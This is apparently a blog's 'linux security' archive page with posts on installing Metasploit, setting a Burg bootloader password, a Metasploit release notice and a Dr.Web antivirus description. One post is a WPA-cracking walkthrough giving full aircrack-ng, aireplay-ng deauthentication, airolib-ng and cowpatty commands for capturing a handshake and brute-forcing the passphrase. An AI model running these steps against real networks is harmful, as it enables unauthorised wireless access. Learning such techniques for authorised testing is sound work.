//
archives

linux security

This category contains 23 posts

Install And Use Metasploit Framework On Linux


Hello 😉

Metasploit is an application that is used to research the security in your network. The Administrators can test their networks that is made by them. What Their network is found the weakness or not. Many exploit type and payload Who can be used on Metasploit. You are able to use Metasploit on Linux operating system

  1. Download Metasploit : Click Here
  2. copy metasploit file to root or home directory
  3. open the terminal
$ cd /
$ sudo su
$ chmod +x framework-3.5.2-linux-x86_64.run
$ ./framework-3.5.2-linux-x86_64.run
$ msfconsole

Once the installation process is complete, enter “hash -r” to reload your path. At this point all of the Metasploit Framework commands should be in the system path (via symlinks in /usr/local/bin), and the framework can be updated by running “msfupdate” as the root user.

Enjoy 😉

AmineSoft

 

Cracking WPA with Backtrack 4


Credits to g0tmi1k. This video goes beyond just cracking wpa, it also shows how the different tools perform. This video explains the methodology really simple. Let me say that cracking WPA is not like cracking WEP, in WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability will be in the strength of the user passphrase. Yes you’ve guessed it, when cracking WPA basically what you’re doing is brute-forcing the user password, in other words the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size. How to find them?… Google is your friend!

Steps:

Download Metasploit : Click Here

airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt

airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap

cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt

genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash

wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1

Download Metasploit : Click Here
Enjoy 😛 & source : click here

How to enable password protection in Burg


Burg is a brand-new boot loader based on GRUB. It uses a new object format which allows it to be built in a wider range of OS. It also has a highly configurable menu system which works in both text and graphic mode. We did show you in a previous post how to install and configure burg in Ubuntu. Today we will see how to enable password protection in burg.

configure user and passwords
To add/edit user, use burg-adduser , for example :

sudo burg-adduser --super admin
sudo burg-adduser user1

The –super option is used to specify super user.

To remove user, use burg-deluser :

sudo burg-deluser user1

The password is stored in /etc/default/burg-passwd.
Setup GRUB_USERS variable in /etc/default/burg
Here is an example:

GRUB_USERS="*=user1,user2:Ubuntu=user1:Windows="

This means user1 can boot Ubuntu, no password is needed for Windows, user1 and user2 can boot other OS besides Ubuntu and Windows. Superusers can boot any OS and use system-wide hotkeys like `c’ to enter console mode.
Generate burg.cfg with update-burg

sudo update-burg

You can use burg-emu to check the configuration before reboot:

sudo burg-emu

Metasploit Framework 3.3 Released!


We are excited to announce the immediate availability of version 3.3 of the Metasploit Framework. This release includes 446 exploits, 216 auxiliary modules, and hundreds of payloads, including an in-memory VNC service and the Meterpreter. In addition, the Windows payloads now support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs were fixed since last year’s release of version 3.2, making this one of the more well-tested releases yet.

FOR DOWNLOAD

framework-3.3-linux-i686.run

 

35,434,869 bytes (34M)
Linux 32-bit installer including all dependencies.

 

framework-3.3-linux-x86_64.run

 

36,635,297 bytes (35M)
Linux 64-bit installer including all dependencies.

 

framework-3.3.tar.bz2

 

22,614,595 bytes (22M)
Unix tar format for installing on all other operating systems.

Dr.Web® anti-virus for Linux (GUI based)


Dr.Web Security Suite for Unix Appliance and  Dr.Web® anti-virus for Linux (GUI based) is a group of modular solutions that can be installed on appliances running Unix-family (Linux/FreeBSD/Solaris(x86) operating systems. The solutions work as a corporate Internet-gateway – a proxy-server used to provide access to the Internet to intranet users.

Depending on your licensing scheme and the set of selected plugins solutions of Dr.Web Security Suite for Unix Appliance can perform the following tasks:
process incoming and outdoing mail and filter out viruses and spam;
scan http and ftp traffic for viruses;
detect and remove any malicious objects;
parse e-mails and analyze each component of a message;
filter e-mail according to white and black lists;
process correctly archived files of most known formats including multi-volume and self-extracting (SFX) archives;
notify recipients or other selected users on results of scanning using templates ensuring that provided information is easy to read
collect statistics regarding all activities of the system;
protect its own plug-ins against failures.
Benefits
Dr.Web means its own technologies and anti-virus laboratory
Dr.Web anti-virus technology has been developed since 1992 and is owned by Doctor Web.
here are few anti-virus vendors in the world with their own technologies for detecting and curing malware, a virus monitoring service and an analytical laboratory. It provides a rapid response to latest threats and allows solving any problems of customers in a few hours.

Large enterprise network experience
Dr.Web solutions for small and medium-sized companies and large corporate networks with dozens of thousands of computers have been developed and improved since 1992. The State Duma of Russia, its Defense and Foreign ministries FSB (Federal Security Service) and many other enterprises, educational institutions and research departments trust anti-virus solutions from Doctor Web.

Openness of the solutions
As usual, Doctor Web makes its contribution to development of open source anti-virus products. Solutions included in Dr.Web Security Suite for Unix Appliance have an unlimited potential for expanding their functionality. Virtually any user with a sufficient skill can implement a desired feature using the source code and the SDK supplied with the software.

Exceptional scalability
Dr.Web Security Suite for Unix Appliance can perfectly suite needs of a small company with just one e-mail server and meet the unlimited e-mail filtering requirements of transnational telecoms or Internet service providers, Its efficiency, flexibility of settings and capability of filtering huge volumes of e-mail traffic “on-the-fly” can comply even with highest demands.

Optimal configuration
Configuration of servers with preinstalled Dr.Web Security Suite for Unix Appliance is the result of thorough optimization. Solutions match requirements of a customer perfectly. Flexible licensing system allows a company to pay only for functionality it is going to use. A server based on Dr.Web Security Suite for Unix Appliance is a high-performance solution at a best price.

Reliable protection
State-of-the art technologies ensure high-speed scan of traffic that doesn’t after Internet access speed and runs unnoticed by users. The solutions feature latest Dr.Web technologies that sheilf user machines from malware and spam. Automatic updating system allows maintaining a high level of security.

High productivity and stable operation
Multi-thread scan feature enables Dr.Web Security Suite for Unix Appliance processing simultaneously large amounts of data. Well-designed modular structure makes it impossible for an attacker to disable a solution. Well-known low system requirements of Dr.Web products allow running them on any server hardware.

Easy installation
Dr.Web Security Suite for Unix Appliance fully complies with the “plug and play” principle making installation and maintenance extremely easy even for an inexperienced user. The installation procedure was designed to exclude any possible configuration errors by staff and reduces time of deployment to several minutes. Installation of an appliance doesn’t affect configuration of computers in a corporate network.

Flexible configuration and easy administration
Dr.Web Security Suite for Unix Appliance allows implementing any protection scheme tailored to the security policy of your company. The solutions have flexible configuration system so virtually any required set of rules can be created by a system administrator. All actions related to the network security are logged. The logged data can be used to analyze network health and pinpoint vulnerabilities. The convenient user alert system that issues virus warnings and notifies a user upon loading of a web-page containing malicious code will assist you in conforming to the security policy of your company.

Frequent updating
An add-on to the Dr.Web virus database is released when new entries are added as often as several times per hour. Hot add-ons are released immediately after a new threat has been analyzed. The global virus monitoring network delivers latest samples of viruses from all over the world. Users retrieve updates from several servers located on different parts of the globe.

Continue reading

Facebook

August 2017
S M T W T F S
« Feb    
 12345
6789101112
13141516171819
20212223242526
2728293031  

Twitter

Error: Twitter did not respond. Please wait a few minutes and refresh this page.

  • 364,942 Visit !
%d bloggers like this: